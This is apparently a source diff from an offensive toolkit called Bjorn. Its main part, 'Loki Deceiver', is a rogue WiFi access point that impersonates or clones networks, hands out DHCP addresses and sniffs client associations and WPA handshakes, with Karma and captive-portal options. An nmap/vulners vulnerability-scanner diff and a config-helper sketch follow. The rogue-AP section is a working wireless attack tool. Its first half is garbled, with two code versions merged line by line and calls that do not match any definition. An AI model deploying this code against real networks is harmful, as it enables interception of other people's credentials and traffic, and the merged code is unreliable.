# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
import os import os
import json import json
import argparse
from datetime import datetime
import logging
import subprocess import subprocess
import signal
import time
import threading import threading
import scapy.all as scapy import time
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver" b_class = "LokiDeceiver"
b_module = "loki_deceiver" b_module = "loki_deceiver"
b_enabled = 0 b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
# Configure logging b_args = {
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') "interface": {
"type": "text",
# Default settings "label": "Wireless Interface",
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi" "default": "wlan0"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn" },
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json") "ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver: class LokiDeceiver:
def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR): def __init__(self, shared_data):
self.interface = interface self.shared_data = shared_data
self.ssid = ssid self.hostapd_proc = None
self.channel = channel self.dnsmasq_proc = None
self.password = password self.tcpdump_proc = None
self.output_dir = output_dir self._sniffer = None
self.active_clients = set()
self.original_mac = None self.stop_event = threading.Event()
self.captured_handshakes = []
self.captured_credentials = []
self.active = False
self.lock = threading.Lock() self.lock = threading.Lock()
def setup_interface(self): def _setup_monitor_mode(self, iface: str):
"""Configure wireless interface for AP mode.""" logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
try: subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
# Kill potentially interfering processes subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
stdout=subprocess.PIPE, stderr=subprocess.PIPE) subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
# Stop NetworkManager
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Save original MAC
self.original_mac = self.get_interface_mac()
# Enable monitor mode
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info(f"Interface {self.interface} configured in monitor mode")
return True
except Exception as e:
logging.error(f"Failed to setup interface: {e}")
return False
def get_interface_mac(self): def _create_configs(self, iface, ssid, channel, password):
"""Get the MAC address of the wireless interface.""" # hostapd.conf
try: h_conf = [
result = subprocess.run(['ip', 'link', 'show', self.interface], f'interface={iface}',
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) 'driver=nl80211',
if result.returncode == 0: f'ssid={ssid}',
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout) 'hw_mode=g',
if mac: f'channel={channel}',
return mac.group(1) 'macaddr_acl=0',
except Exception as e: 'ignore_broadcast_ssid=0'
logging.error(f"Failed to get interface MAC: {e}") ]
return None if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
def create_ap_config(self): # dnsmasq.conf
"""Create configuration for hostapd.""" d_conf = [
try: f'interface={iface}',
config = [ 'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'interface=' + self.interface, 'dhcp-option=3,192.168.1.1',
'driver=nl80211', 'dhcp-option=6,192.168.1.1',
'ssid=' + self.ssid, 'server=8.8.8.8',
'hw_mode=g', 'log-queries',
'channel=' + str(self.channel), 'log-dhcp'
'macaddr_acl=0', ]
'ignore_broadcast_ssid=0' d_path = '/tmp/bjorn_dnsmasq.conf'
] with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
if self.password:
config.extend([ return h_path, d_path
'auth_algs=1',
'wpa=2',
'wpa_passphrase=' + self.password,
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
config_path = '/tmp/hostapd.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
return config_path
except Exception as e:
logging.error(f"Failed to create AP config: {e}")
return None
def setup_dhcp(self): def _packet_callback(self, packet):
"""Configure DHCP server using dnsmasq.""" if self.shared_data.orchestrator_should_exit:
try:
config = [
'interface=' + self.interface,
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
config_path = '/tmp/dnsmasq.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
# Configure interface IP
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return config_path
except Exception as e:
logging.error(f"Failed to setup DHCP: {e}")
return None
def start_ap(self):
"""Start the fake access point."""
try:
if not self.setup_interface():
return False
hostapd_config = self.create_ap_config()
dhcp_config = self.setup_dhcp()
if not hostapd_config or not dhcp_config:
return False
# Start hostapd
self.hostapd_process = subprocess.Popen(
['sudo', 'hostapd', hostapd_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start dnsmasq
self.dnsmasq_process = subprocess.Popen(
['sudo', 'dnsmasq', '-C', dhcp_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.active = True
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
# Start packet capture
self.start_capture()
return True
except Exception as e:
logging.error(f"Failed to start AP: {e}")
return False
def start_capture(self):
"""Start capturing wireless traffic."""
try:
# Start tcpdump for capturing handshakes
handshake_path = os.path.join(self.output_dir, 'handshakes')
os.makedirs(handshake_path, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
self.tcpdump_process = subprocess.Popen(
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start sniffing in a separate thread
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
self.sniffer_thread.start()
except Exception as e:
logging.error(f"Failed to start capture: {e}")
def packet_sniffer(self):
"""Sniff and process packets."""
try:
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
stop_filter=lambda p: not self.active)
except Exception as e:
logging.error(f"Sniffer error: {e}")
def process_packet(self, packet):
"""Process captured packets."""
try:
if packet.haslayer(Dot11):
# Process authentication attempts
if packet.type == 0 and packet.subtype == 11: # Authentication
self.process_auth(packet)
# Process association requests
elif packet.type == 0 and packet.subtype == 0: # Association request
self.process_assoc(packet)
# Process EAPOL packets for handshakes
elif packet.haslayer(EAPOL):
self.process_handshake(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def process_auth(self, packet):
"""Process authentication packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'auth',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing auth packet: {e}")
def process_assoc(self, packet):
"""Process association packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'assoc',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing assoc packet: {e}")
def process_handshake(self, packet):
"""Process EAPOL packets for handshakes."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_handshakes.append({
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing handshake packet: {e}")
def save_results(self):
"""Save captured data to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'ap_info': {
'ssid': self.ssid,
'channel': self.channel,
'interface': self.interface
},
'credentials': self.captured_credentials,
'handshakes': self.captured_handshakes
}
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def cleanup(self):
"""Clean up resources and restore interface."""
try:
self.active = False
# Stop processes
for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
if process:
process.terminate()
process.wait()
# Restore interface
if self.original_mac:
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Restart NetworkManager
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info("Cleanup completed")
except Exception as e:
logging.error(f"Error during cleanup: {e}")
def save_settings(interface, ssid, channel, password, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"ssid": ssid,
"channel": channel,
"password": password,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="WiFi deception tool")
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
parser.add_argument("-p", "--password", help="WPA2 password")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
# Honeypot options
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
# Advanced options
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
ssid = args.ssid or settings.get("ssid")
channel = args.channel or settings.get("channel")
password = args.password or settings.get("password")
output_dir = args.output or settings.get("output_dir")
# Load advanced settings
captive_portal = args.captive_portal or settings.get("captive_portal", False)
clone_ap = args.clone_ap or settings.get("clone_ap")
karma = args.karma or settings.get("karma", False)
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
max_clients = args.max_clients or settings.get("max_clients", 10)
timeout = args.timeout or settings.get("timeout")
if not interface:
logging.error("Interface is required. Use -i or save it in settings")
return
# Clone AP if requested
if clone_ap:
logging.info(f"Attempting to clone AP: {clone_ap}")
clone_info = scan_for_ap(interface, clone_ap)
if clone_info:
ssid = clone_info['ssid']
channel = clone_info['channel']
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
else:
logging.error(f"Failed to find AP to clone: {clone_ap}")
            return

    # Save all settings
    save_settings(
        interface=interface,
        ssid=ssid,
        channel=channel,
        password=password,
        output_dir=output_dir,
        captive_portal=captive_portal,
        clone_ap=clone_ap,
        karma=karma,
        beacon_interval=beacon_interval,
        max_clients=max_clients,
        timeout=timeout
    )
    # Create and configure deceiver
    deceiver = LokiDeceiver(
        interface=interface,
        ssid=ssid,
        channel=channel,
        password=password,
        output_dir=output_dir,
        captive_portal=captive_portal,
        karma=karma,
        beacon_interval=beacon_interval,
        max_clients=max_clients
    )
    try:
        # Start the deception
        if deceiver.start():
            logging.info(f"Access point {ssid} started on channel {channel}")
            if timeout:
                logging.info(f"Running for {timeout} seconds")
                time.sleep(timeout)
                deceiver.stop()
            else:
                logging.info("Press Ctrl+C to stop")
                while True:
                    time.sleep(1)
    except KeyboardInterrupt:
        logging.info("Stopping Loki Deceiver...")
    except Exception as e:
        logging.error(f"Unexpected error: {e}")
    finally:
        deceiver.stop()
        logging.info("Cleanup completed")

if __name__ == "__main__":
    # Set process niceness to high priority
    try:
        os.nice(-10)
    except Exception:
        logging.warning("Failed to set process priority. Running with default priority.")
    # Start main function
    main()

    def _packet_callback(self, packet):
        if packet.haslayer(Dot11):
            addr2 = packet.addr2  # Source MAC
            if addr2 and addr2 not in self.active_clients:
                # Association request or Auth
                if packet.type == 0 and packet.subtype in [0, 11]:
                    with self.lock:
                        self.active_clients.add(addr2)
                    logger.success(f"LokiDeceiver: New client detected: {addr2}")
                    self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
            if EAPOL and packet.haslayer(EAPOL):
                logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
                self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")

    def execute(self, ip, port, row, status_key) -> str:
        iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
        ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
        channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
        password = getattr(self.shared_data, "loki_deceiver_password", "")
        timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
        output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")

        logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
        self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")

        try:
            self.stop_event.clear()
            # self._setup_monitor_mode(iface)  # Optional depending on driver
            h_path, d_path = self._create_configs(iface, ssid, channel, password)

            # Set IP for interface
            subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)

            # Start processes
            # Use DEVNULL to avoid blocking on unread PIPE buffers.
            self.hostapd_proc = subprocess.Popen(
                ['sudo', 'hostapd', h_path],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            self.dnsmasq_proc = subprocess.Popen(
                ['sudo', 'dnsmasq', '-C', d_path, '-k'],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )

            # Start sniffer (must be stoppable to avoid leaking daemon threads).
            if HAS_SCAPY and scapy and AsyncSniffer:
                try:
                    self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
                    self._sniffer.start()
                except Exception as sn_e:
                    logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
                    self._sniffer = None

            start_time = time.time()
            while time.time() - start_time < timeout:
                if self.shared_data.orchestrator_should_exit:
                    break
                # Check if procs still alive
                if self.hostapd_proc.poll() is not None:
                    logger.error("LokiDeceiver: hostapd crashed.")
                    break
                # Progress report
                elapsed = int(time.time() - start_time)
                prog = int((elapsed / timeout) * 100)
                self.shared_data.bjorn_progress = f"{prog}%"
                if elapsed % 60 == 0:
                    self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
                time.sleep(2)

            logger.info("LokiDeceiver: Stopping AP.")
            self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
        except Exception as e:
            logger.error(f"LokiDeceiver error: {e}")
            return "failed"
        finally:
            self.stop_event.set()
            if self._sniffer is not None:
                try:
                    self._sniffer.stop()
                except Exception:
                    pass
                self._sniffer = None
            # Cleanup
            for p in [self.hostapd_proc, self.dnsmasq_proc]:
                if p:
                    try:
                        p.terminate()
                        p.wait(timeout=5)
                    except Exception:
                        pass
            # Restore NetworkManager if needed (custom logic based on usage)
            # subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
        return "success"

if __name__ == "__main__":
    from init_shared import shared_data
    loki = LokiDeceiver(shared_data)
    loki.execute("0.0.0.0", None, {}, "loki_deceiver")
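`execute()` calls a `_create_configs()` helper that this diff does not show. A minimal sketch of what such a helper could generate; the hostapd/dnsmasq option names below are standard, but the exact fields and paths Bjorn writes are assumptions:

```python
import os
import tempfile

def create_configs(iface: str, ssid: str, channel: int, password: str = ""):
    """Write minimal hostapd/dnsmasq configs and return their paths."""
    hostapd_lines = [
        f"interface={iface}",
        "driver=nl80211",
        f"ssid={ssid}",
        "hw_mode=g",
        f"channel={channel}",
    ]
    if password:  # WPA2-PSK when a passphrase is set; open AP otherwise
        hostapd_lines += [
            "wpa=2",
            f"wpa_passphrase={password}",
            "wpa_key_mgmt=WPA-PSK",
            "rsn_pairwise=CCMP",
        ]
    dnsmasq_lines = [
        f"interface={iface}",
        "dhcp-range=192.168.1.10,192.168.1.100,12h",
        "address=/#/192.168.1.1",  # resolve every name to the AP (captive-portal style)
    ]
    conf_dir = tempfile.mkdtemp(prefix="loki_")
    h_path = os.path.join(conf_dir, "hostapd.conf")
    d_path = os.path.join(conf_dir, "dnsmasq.conf")
    with open(h_path, "w") as f:
        f.write("\n".join(hostapd_lines) + "\n")
    with open(d_path, "w") as f:
        f.write("\n".join(dnsmasq_lines) + "\n")
    return h_path, d_path

h, d = create_configs("wlan0", "Bjorn_AP", 6, "secret123")
```

The returned paths are what `execute()` would pass to `hostapd` and `dnsmasq -C`.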

View File

@@ -2,13 +2,16 @@
Vulnerability Scanner Action
Ultra-fast CPE scan (+ CVE via vulners when available),
with an optional "heavy" fallback.
Reports progress as a percentage in Bjorn.
"""
import re
import time
import nmap
import json
import logging
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
@@ -22,41 +25,47 @@ b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None

# Regex compiled once (saves CPU on the Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)

class NmapVulnScanner:
    """Nmap-based vulnerability scanner (fast CPE/CVE mode) with progress reporting."""

    def __init__(self, shared_data: SharedData):
        self.shared_data = shared_data
        # No shared self.nm: a PortScanner is instantiated inside each scan method
        # to avoid state corruption between batches.
        logger.info("NmapVulnScanner initialized")

    # ---------------------------- Public API ---------------------------- #
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        try:
            logger.info(f"Starting vulnerability scan for {ip}")
            self.shared_data.bjorn_orch_status = "NmapVulnScanner"
            self.shared_data.bjorn_progress = "0%"

            if self.shared_data.orchestrator_should_exit:
                return 'failed'

            # 1) Metadata
            meta = {}
            try:
                meta = json.loads(row.get('metadata') or '{}')
            except Exception:
                pass

            # 2) Fetch the MAC and ALL of the host's ports
            mac = row.get("MAC Address") or row.get("mac_address") or ""
            ports_str = ""
            if mac:
                r = self.shared_data.db.query(
@@ -64,8 +73,7 @@ class NmapVulnScanner:
                )
                if r and r[0].get('ports'):
                    ports_str = r[0]['ports']
            if not ports_str:
                ports_str = (
                    row.get("Ports") or row.get("ports") or
@@ -73,143 +81,240 @@
                )
            if not ports_str:
                logger.warning(f"No ports to scan for {ip}")
                self.shared_data.bjorn_progress = ""
                return 'failed'

            ports = [p.strip() for p in ports_str.split(';') if p.strip()]
            # Clean up the ports (keep just the number for entries like 80/tcp)
            ports = [p.split('/')[0] for p in ports]
            self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
            logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")

            # 3) "Rescan only" filtering
            if self.shared_data.config.get('vuln_rescan_on_change_only', False):
                if self._has_been_scanned(mac):
                    original_count = len(ports)
                    ports = self._filter_ports_already_scanned(mac, ports)
                    logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
                    if not ports:
                        logger.info(f"No new/changed ports to scan for {ip}")
                        self.shared_data.bjorn_progress = "100%"
                        return 'success'

            # 4) Scan with progress reporting
            if self.shared_data.orchestrator_should_exit:
                return 'failed'
            logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
            findings = self.scan_vulnerabilities(ip, ports)

            if self.shared_data.orchestrator_should_exit:
                logger.info("Scan interrupted by user")
                return 'failed'

            # 5) In-memory deduplication before persisting
            findings = self._deduplicate_findings(findings)

            # 6) Persistence
            self.save_vulnerabilities(mac, ip, findings)

            # Finalize the UI
            self.shared_data.bjorn_progress = "100%"
            self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
            logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
            return 'success'

        except Exception as e:
            logger.error(f"NmapVulnScanner failed for {ip}: {e}")
            self.shared_data.bjorn_progress = "Error"
            return 'failed'
    def _has_been_scanned(self, mac: str) -> bool:
        """Check whether the host has already been scanned at least once."""
        rows = self.shared_data.db.query("""
            SELECT 1 FROM action_queue
            WHERE mac_address=? AND action_name='NmapVulnScanner'
            AND status IN ('success', 'failed')
            LIMIT 1
        """, (mac,))
        return bool(rows)
    def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
        """Return the ports to scan, excluding those already scanned recently."""
        if not ports:
            return []
        # Ports already covered by detected_software (is_active=1)
        rows = self.shared_data.db.query("""
            SELECT port, last_seen
            FROM detected_software
            WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
        """, (mac,))
        seen = {}
        for r in rows:
            try:
                seen[str(r['port'])] = r.get('last_seen')
            except Exception:
                pass
        ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
        if ttl > 0:
            cutoff = datetime.utcnow() - timedelta(seconds=ttl)
            final_ports = []
            for p in ports:
                if p not in seen:
                    final_ports.append(p)
                else:
                    try:
                        dt = datetime.fromisoformat(seen[p].replace('Z', ''))
                        if dt < cutoff:
                            final_ports.append(p)
                    except Exception:
                        pass
            return final_ports
        else:
            # Without a TTL: skip any port already scanned and still active
            return [p for p in ports if p not in seen]
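The TTL branch above keeps a port when it was never seen, or when its `last_seen` record is older than the cutoff; timestamps that fail to parse are treated as fresh and skipped. The same freshness test in isolation (the ISO-8601-with-`Z` timestamp format is assumed from the `replace('Z', '')` call):

```python
from datetime import datetime, timedelta

def ports_needing_rescan(ports, last_seen_by_port, ttl_seconds):
    """Keep ports never seen, or whose record is older than the TTL."""
    cutoff = datetime.utcnow() - timedelta(seconds=ttl_seconds)
    keep = []
    for p in ports:
        ts = last_seen_by_port.get(p)
        if ts is None:
            keep.append(p)  # never scanned
            continue
        try:
            if datetime.fromisoformat(ts.replace('Z', '')) < cutoff:
                keep.append(p)  # record expired, rescan
        except ValueError:
            pass  # unparseable timestamp: treated as fresh, like the method above
    return keep

seen = {"22": "2000-01-01T00:00:00Z", "80": datetime.utcnow().isoformat()}
assert ports_needing_rescan(["22", "80", "443"], seen, 3600) == ["22", "443"]
```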
    # ---------------------------- Helpers -------------------------------- #
    def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
        """Drop duplicates (same port + vuln_id) to avoid pointless inserts."""
        seen: set = set()
        deduped = []
        for f in findings:
            key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
            if key not in seen:
                seen.add(key)
                deduped.append(f)
        return deduped

    def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
        cpe = port_info.get('cpe')
        if not cpe:
            return []
        if isinstance(cpe, str):
            return [x.strip() for x in cpe.splitlines() if x.strip()]
        if isinstance(cpe, (list, tuple, set)):
            return [str(x).strip() for x in cpe if str(x).strip()]
        return [str(cpe).strip()]

    def extract_cves(self, text: str) -> List[str]:
        """Extract CVE identifiers with the pre-compiled regex (no recompilation per call)."""
        if not text:
            return []
        return CVE_RE.findall(str(text))
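Compiling `CVE_RE` once at import time means `extract_cves()` never pays for `re.compile` again, which is the stated CPU saving on the Pi Zero. The extraction on its own:

```python
import re

# Compiled once at module import, reused on every call
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)

def extract_cves(text: str) -> list:
    """Return CVE identifiers found in arbitrary scanner output."""
    return CVE_RE.findall(str(text)) if text else []

out = extract_cves("vulners: cve-2021-44228 9.8, CVE-2017-0144 (EternalBlue)")
assert out == ["cve-2021-44228", "CVE-2017-0144"]  # matches preserve input casing
```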
    # ---------------------------- Scanning (Batch Mode) ------------------------------ #
    def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
        """
        Orchestrate the scan in batches so the progress bar can be updated.
        """
        all_findings = []
        fast = bool(self.shared_data.config.get('vuln_fast', True))
        use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
        max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
        # The pause between batches matters on a Pi Zero: it lets the CPU breathe
        batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
        # Small batch size by default (2 on a Pi Zero, configurable)
        batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))

        target_ports = ports[:max_ports]
        total = len(target_ports)
        if total == 0:
            return []

        batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
        processed_count = 0

        for batch in batches:
            if self.shared_data.orchestrator_should_exit:
                break
            port_str = ','.join(batch)

            # Update the UI before scanning the batch
            pct = int((processed_count / total) * 100)
            self.shared_data.bjorn_progress = f"{pct}%"
            self.shared_data.comment_params = {
                "ip": ip,
                "progress": f"{processed_count}/{total} ports",
                "current_batch": port_str
            }

            t0 = time.time()
            # Scan the batch (local PortScanner instance to avoid state corruption)
            if fast:
                batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
            else:
                batch_findings = self._scan_heavy(ip, port_str)
            elapsed = time.time() - t0
            logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s: {len(batch_findings)} finding(s)")

            all_findings.extend(batch_findings)
            processed_count += len(batch)

            # Post-batch update
            pct = int((processed_count / total) * 100)
            self.shared_data.bjorn_progress = f"{pct}%"

            # CPU pause between batches (vital on a Pi Zero)
            if batch_pause > 0 and processed_count < total:
                time.sleep(batch_pause)

        return all_findings
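Stripped of the scanner calls and UI plumbing, the batch loop above is plain list chunking plus a percentage counter:

```python
def chunk(items, size):
    """Split a list into consecutive batches of at most `size` items."""
    return [items[i:i + size] for i in range(0, len(items), size)]

ports = ["22", "80", "139", "443", "8080"]
batches = chunk(ports, 2)
assert batches == [["22", "80"], ["139", "443"], ["8080"]]

done, total, progress = 0, len(ports), []
for batch in batches:
    done += len(batch)                       # count ports, not batches
    progress.append(f"{int(done / total * 100)}%")
assert progress == ["40%", "80%", "100%"]    # final batch always lands on 100%
```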
    def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
        vulns: List[Dict] = []
        nm = nmap.PortScanner()  # Local instance: no shared state
        # --version-light instead of --version-all: much faster on a Pi Zero
        # --min-rate/--max-rate: avoids saturating the CPU and the network
        args = (
            "-sV --version-light -T4 "
            "--max-retries 1 --host-timeout 60s --script-timeout 20s "
            "--min-rate 50 --max-rate 100"
        )
        if use_vulners:
            args += " --script vulners --script-args mincvss=0.0"
        logger.debug(f"[FAST] nmap {ip} -p {port_list}")
        try:
            nm.scan(hosts=ip, ports=port_list, arguments=args)
        except Exception as e:
            logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
            return vulns
        if ip not in nm.all_hosts():
            return vulns
        host = nm[ip]
        for proto in host.all_protocols():
            for port in host[proto].keys():
                port_info = host[proto][port]
                service = port_info.get('name', '') or ''
                # CPE
                for cpe in self._extract_cpe_values(port_info):
                    vulns.append({
                        'port': port,
                        'service': service,
                        'vuln_id': f"CPE:{cpe}",
                        'script': 'service-detect',
                        'details': f"CPE: {cpe}"
                    })
                # CVE via vulners
                if use_vulners:
                    script_out = (port_info.get('script') or {}).get('vulners')
                    if script_out:
                        for cve in self.extract_cves(script_out):
@@ -218,97 +323,73 @@
                                'service': service,
